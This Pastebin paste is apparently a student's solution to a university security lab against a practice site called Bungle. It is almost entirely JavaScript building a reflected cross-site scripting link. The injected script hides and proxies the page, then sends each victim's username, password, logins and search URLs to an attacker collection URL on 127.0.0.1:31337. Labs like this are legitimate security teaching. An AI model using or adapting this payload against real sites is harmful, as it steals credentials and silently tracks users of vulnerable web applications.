Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- $(document).ready(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- function payload(attacker, target) {
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function login(username, userpass, href) {
- $("html").load(href, {username: username, password:userpass}, function(){
- var url = target;
- history.pushState({state:"login"}, '', url);
- $(".btn").attr("type", "button"); // clear submit
- log({event: "login", user: username, pass: userpass});
- log({event: "nav", user: username, url:url});
- $(".btn").mousedown(function(e){
- if(e.which === 1){
- switch($(this).attr("id")) {
- case "log-out-btn":
- logout(username);
- break;
- case "search-btn":
- search($("#query").val(), username);
- break;
- }
- }
- });
- });
- }
- function logout(username) {
- $("html").load("./logout",{username: username}, function(){
- var url = target
- history.pushState({state:"logout"}, '', url);
- $(".btn").attr("type", "button"); // clear submit
- log({event: "logout", user: username});
- log({event: "nav", url:url});
- $(".btn").mousedown(function(e){
- if(e.which === 1){
- switch($(this).attr("id")) {
- case "log-in-btn":
- login($("#username").val(), $("#userpass").val(), "./login");
- break;
- case "new-account-btn":
- login($("#username").val(), $("#userpass").val(), "./create");
- break;
- case "search-btn":
- search($("#query").val(), "");
- break;
- }
- }
- });
- });
- }
- function search(q, username) {
- $("html").load("./search", function(){
- $(".btn").attr("type", "button"); // clear submit
- $("#search-again-btn").removeAttr("href"); // remove link
- var url = target + "./search?q=" + q;
- history.pushState({state: "search"}, '', url);
- if(username === "") {log({event: "nav", url:url});}
- else {
- log({event: "nav", user: username, url:url});
- //TODO: hide script in search history
- }
- $(".btn").mousedown(function(e){
- if(e.which === 1){
- switch($(this).attr("id")) {
- case "log-out-btn":
- logout(username);
- break;
- case "search-again-btn":
- proxy("./");
- break;
- }
- }
- });
- });
- }
- function proxy(href) {
- $("html").load(href, function(){
- $("html").show();
- $(".btn").attr("type", "button"); // clear submit
- var username = $("#logged-in-user").text();
- var url = target;
- history.pushState({}, '', url);
- if(username == ""){
- log({event: "nav", url: url});
- }
- else {
- log({event: "nav", user:username, url: url});
- }
- // Different button cases
- $(".btn").mousedown(function(e){
- if(e.which === 1){
- switch($(this).attr("id")) {
- case "log-in-btn":
- login($("#username").val(), $("#userpass").val(), "./login");
- break;
- case "new-account-btn":
- login($("#username").val(), $("#userpass").val(), "./create");
- break;
- case "log-out-btn":
- logout(username);
- break;
- case "search-btn":
- search($("#query").val(), "");
- break;
- }
- }
- });
- });
- }
- $("html").hide();
- proxy("./");
- }
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\"," + "\"" + target + "\" );</script" + ">");
- }
- }
- var xssdefense = 0;
- var target = "http://bungle-cs461.cs.illinois.edu/";
- var attacker = "http://127.0.0.1:31337/stolen";
- </script>
- <h3>Hello</h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement